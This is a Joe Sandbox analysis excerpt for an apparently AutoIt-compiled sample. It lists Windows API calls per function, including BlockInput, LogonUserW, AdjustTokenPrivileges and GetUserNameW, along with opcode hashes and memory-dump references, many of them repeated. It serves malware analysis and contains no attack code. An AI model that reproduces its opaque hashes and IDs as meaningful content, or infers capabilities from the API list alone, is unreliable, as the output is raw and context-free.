                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: f2082c615700d8f2f64d14a82a245053b3ad7f0f2ea64d41feed7c6f608bef40
                                                                                                                        • Instruction ID: a4c489cf8c0c8fa24b4faa610d084d97f894341465dd463fbe38adef887dd515
                                                                                                                        • Opcode Fuzzy Hash: f2082c615700d8f2f64d14a82a245053b3ad7f0f2ea64d41feed7c6f608bef40
                                                                                                                        • Instruction Fuzzy Hash: 0511A1326042009FD710EF29C845A6AF7E9FF84320F04851EF8AAD7291DB78AC01DB81
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00FF977D,?,0100FB84,?), ref: 00FEA302
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00FF977D,?,0100FB84,?), ref: 00FEA314
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: e7c50294ed428a59233532d64fddcd0c0ff736fc57fa09e15a4c0e9aa7dc8f4b
                                                                                                                        • Instruction ID: 192a5cc718b205b5b67954da875fd93a94748222d2598860bd13da9d29d9f46e
                                                                                                                        • Opcode Fuzzy Hash: e7c50294ed428a59233532d64fddcd0c0ff736fc57fa09e15a4c0e9aa7dc8f4b
                                                                                                                        • Instruction Fuzzy Hash: C3F0E23150422DABDB21AFA5CC48FEA736DBF08361F008156B908D2180DA30A900DBE1
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8851), ref: 00FD8728
                                                                                                                        • CloseHandle.KERNEL32(?,?,00FD8851), ref: 00FD873A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: 01f4b9ffe388ac36e3f2ee2fb28965a7da3a12ed02dde41332325aaa0f249bc0
                                                                                                                        • Instruction ID: 9d7930eb78ef8826bd6a4a312a0c85c7d74a9b899b8c8ddad85227c5444d184e
                                                                                                                        • Opcode Fuzzy Hash: 01f4b9ffe388ac36e3f2ee2fb28965a7da3a12ed02dde41332325aaa0f249bc0
                                                                                                                        • Instruction Fuzzy Hash: B8E0B6B6010611EFE7362B60EC09D777BA9FB047A0B25C829B4A680474DB66AC91EB10
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FA8F97,?,?,?,00000001), ref: 00FAA39A
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FAA3A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                                                                                                                        • Instruction ID: ba911ee3f23f9caee27f7313bd55e44b60a8e859c6b05a48578a50b6a603392c
                                                                                                                        • Opcode Fuzzy Hash: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                                                                                                                        • Instruction Fuzzy Hash: 87B0923105820AABCA222B91E809B883F68EB45AB2F408010F64D84054CBE75450AB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                                                                                                                        • Instruction ID: f48c6d3048a0e4cd4365bb35fa2aa23d35ca057165c014ddd266d170975b4e8b
                                                                                                                        • Opcode Fuzzy Hash: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                                                                                                                        • Instruction Fuzzy Hash: 42323472D69F014DD7239534D872336A299AFB73D4F14D737E81AB9A9AEB2DC4831200
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                                                                                                                        • Instruction ID: 120dc247da06cbba426579a9501132091d13bbdc62cf1252de0d087ba36f4edc
                                                                                                                        • Opcode Fuzzy Hash: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                                                                                                                        • Instruction Fuzzy Hash: 58B1F130E2AF818DD72396398831336B64CAFBB2D5F51D71BFC6675D16EB2A85834240
                                                                                                                        APIs
                                                                                                                        • __time64.LIBCMT ref: 00FE8B25
                                                                                                                          • Part of subcall function 00FA543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FE91F8,00000000,?,?,?,?,00FE93A9,00000000,?), ref: 00FA5443
                                                                                                                          • Part of subcall function 00FA543A: __aulldiv.LIBCMT ref: 00FA5463
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2893107130-0
                                                                                                                        • Opcode ID: f8f628e5c28b482c7050e02d694f2d508b4405fc952fd6f88006ad913a7e79b4
                                                                                                                        • Instruction ID: 1d373550d99fb5b6dfc18bc0c093da42ab374448a19c929e098fe7028d4b332a
                                                                                                                        • Opcode Fuzzy Hash: f8f628e5c28b482c7050e02d694f2d508b4405fc952fd6f88006ad913a7e79b4
                                                                                                                        • Instruction Fuzzy Hash: 8F21E7B26355508FC329CF25D441B52B3E1EBA5321B288E2CD4E9CF2D0CA75B905DB94
                                                                                                                        APIs
                                                                                                                        • BlockInput.USER32(00000001), ref: 00FF4218
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockInput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3456056419-0
                                                                                                                        • Opcode ID: 8bfa793727673ad3b2b731e5aaac998f1d4013ed6eb5eb9e89d037c88b91712d
                                                                                                                        • Instruction ID: 0d508a2aa155353e0db5a7582059d2f9075a79b6404e97dd073e47fb6c0da7a2
                                                                                                                        • Opcode Fuzzy Hash: 8bfa793727673ad3b2b731e5aaac998f1d4013ed6eb5eb9e89d037c88b91712d
                                                                                                                        • Instruction Fuzzy Hash: 86E048312441155FC710EF59D844AABF7D8AF94760F048025FD49C7351DAB5F840DB90
                                                                                                                        APIs
                                                                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00FE4F18
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: mouse_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2434400541-0
                                                                                                                        • Opcode ID: 752488138c2c016f4a426f774342d9b67ceb2ecf0b1e6bce443a9f72359056a3
                                                                                                                        • Instruction ID: 417b67595b489cbd514049f7aa9b6e2f35721e5d969d344cc86357e4a4070276
                                                                                                                        • Opcode Fuzzy Hash: 752488138c2c016f4a426f774342d9b67ceb2ecf0b1e6bce443a9f72359056a3
                                                                                                                        • Instruction Fuzzy Hash: E2D05EB15682C579FC284B22AC1FF76110AE380FA1F84498E3201875C299E6B800B434
                                                                                                                        APIs
                                                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FD88D1), ref: 00FD8CB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LogonUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1244722697-0
                                                                                                                        • Opcode ID: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
                                                                                                                        • Instruction ID: d5db774f1666c6f62323c3dd4bfd4c7f6edbeb51ab8a456ad5ae6c28cd0376f8
                                                                                                                        • Opcode Fuzzy Hash: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
                                                                                                                        • Instruction Fuzzy Hash: 97D05E3226090EABEF11CEA4DC01EAF3B69EB04B01F408111FE15C5090C776D835AF60
                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00FC2242
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2645101109-0
                                                                                                                        • Opcode ID: eb883db5c9132404f2134f76db4975176c8c7fc340ac8cb8086e3562b44bc098
                                                                                                                        • Instruction ID: 9325b60004722a3b399077e7ddaf7d83d79c834dfdf1ca033e80cb70c8e5a52f
                                                                                                                        • Opcode Fuzzy Hash: eb883db5c9132404f2134f76db4975176c8c7fc340ac8cb8086e3562b44bc098
                                                                                                                        • Instruction Fuzzy Hash: B6C04CF1C0410ADBDB15DB90D688EEE77BCBB04304F104155A141F2100D7749B449F71
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FAA36A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                                                                                                                        • Instruction ID: 4fc1d08d65833745488d82020a48d1e715a3b5c71e5db6a99c1634bf9c5daa6f
                                                                                                                        • Opcode Fuzzy Hash: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                                                                                                                        • Instruction Fuzzy Hash: 75A0123000410DA78A111B41E8044447F5CD6001A0B008010F40C4001187B354105680
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bc7f12e797d8d0fb7829acdcb8c7cc3a331b62008f65109ac57188ec0a7610dd
                                                                                                                        • Instruction ID: 0b7a2070e47533eb0efad570c3a2d25762d96f41fa9f995a19f56512c7287acf
                                                                                                                        • Opcode Fuzzy Hash: bc7f12e797d8d0fb7829acdcb8c7cc3a331b62008f65109ac57188ec0a7610dd
                                                                                                                        • Instruction Fuzzy Hash: D922F571D01616CBEF288F24C49477D77A2EB427A4F6C486BD8429B291DB34DD82FB60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                        • Instruction ID: 3073a19d66832d3b845137c6c2771659f0b41a0acc86610b4a1c00ebf98181a6
                                                                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                        • Instruction Fuzzy Hash: 04C170B26051A30DDBAD863D943413EBAE16EA37B131A075DE8B2CB5C5EF20D564F620
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                        • Instruction ID: bc50eb1e19ec0a41c371aa16dd41bb87a29142b60ee8c4f3ac83735601a5fe0d
                                                                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                        • Instruction Fuzzy Hash: C6C1A4B26051A30ADFAD463DD43413EBBE16AA37B131A076DE4B2DB4D4EF20D524F620
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                        • Instruction ID: 0a8019ad923a721179e600434ae80fe32ddb881f8649980f4f9206179ddfddfc
                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                        • Instruction Fuzzy Hash: 45C1A1B26051A30DDF6D463A947413EBAE17AA37B171B076DE4B2CB5C4EF20D524F620
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00FF7B70
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00FF7B82
                                                                                                                        • DestroyWindow.USER32 ref: 00FF7B90
                                                                                                                        • GetDesktopWindow.USER32 ref: 00FF7BAA
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00FF7BB1
                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00FF7CF2
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00FF7D02
                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7D4A
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00FF7D56
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FF7D90
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7DB2
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7DC5
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7DD0
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00FF7DD9
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7DE8
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF7DF1
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7DF8
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00FF7E03
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7E15
                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01012CAC,00000000), ref: 00FF7E2B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00FF7E3B
                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00FF7E61
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00FF7E80
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7EA2
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF808F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
